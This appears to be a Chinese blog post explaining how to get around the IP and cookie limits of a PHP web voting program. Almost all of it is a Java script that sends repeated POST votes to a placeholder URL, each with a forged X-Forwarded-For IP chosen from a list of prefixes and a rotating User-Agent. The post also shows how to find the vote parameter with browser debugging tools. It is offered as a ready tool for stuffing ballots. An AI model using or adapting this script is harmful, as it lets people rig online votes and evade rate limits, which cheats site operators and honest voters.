某WEB投票程序, 使用 ip 限制和cookie限制技术,来限制每个ip每天只能投一次票,使用的是php开发,获取访问者的 ip 使用了搜狐的接口:
http://txt.go.sohu.com/ip/soip
下面是如何突破 ip 限制,达到任意控制投票的 ip ,从而如破 ip 限制:
package com.github.digdeep126; import java.io.OutputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;
import java.util.Random; public class Post {
public static final String[] ipArrays = {
"66.102.251.", "112.211.0.", "141.8.225.","159.106.121.",
"216.58.221.", "61.244.148.", "59.125.39.", "58.30.15.", "114.80.166.",
"202.96.134.", "58.19.24.", "119.39.23.", "58.195.128.", "124.236.223.",
"183.221.217.", "222.182.90.", "58.194.96.", "211.138.161.",
"112.112.13.", "219.159.82.", "202.98.226.", " 61.128.101.",
"130.039.000.", "130.039.255.", "131.230.000.","131.230.255.",
"144.092.000.", "144.092.255.", "151.000.000.", "152.255.255.",
"161.058.000.", "161.058.255.", "169.208.000.", "169.223.255.",
"171.208.000.", "171.220.255.", "195.010.040.", "195.010.040.",
"195.010.062.", "195.010.063.", "195.010.194.", "195.010.194.",
"195.063.159.", "195.063.159.", "195.090.044.", "195.090.046.",
"195.090.047.", "195.090.048.", "195.090.049.", "195.090.051.",
"195.090.052.", "195.090.053.", "195.100.066.", "195.112.164.",
"195.112.172.", "195.112.173."}; public static void main(String[] args) throws Exception{ for(int i=0; i<20; i++){
Runnable runn = new Runnable() {
public void run() {
try {
post();
} catch (Exception e) {
e.printStackTrace();
}
}
};
new Thread(runn).run();
Thread.sleep(2000);
}
} public static void post() throws Exception{
URL url = new URL("http://xxxxxxxxxxxx");
URLConnection con = url.openConnection(); con.setDoOutput(true);
con.setDoInput(true); Random r = new Random();
Integer counter = r.nextInt(255); int index = r.nextInt(34);
String ip = ipArrays[index]; con.setRequestProperty("X-Forwarded-For", ip + counter);
System.out.println(ip+counter);
con.setRequestProperty("cache-control","max-age=0");
if(r.nextInt(10) % 2 == 0)
con.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19");
else
con.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); con.setUseCaches(false); OutputStream out = con.getOutputStream();
out.write(("data=" + xxx).getBytes());
out.flush();
out.close();
con.getInputStream();
}
}
每运行一次,开了20个线程去 post 提交20次,提交的数据为:data=xxxx,每次提交伪造一个 ip 地址。突破了server 端 PHP 代码中的ip限制。
至于 如何 知道 提交的数据为:data=xxx,使用 firebug或者chrome调试下就清楚了。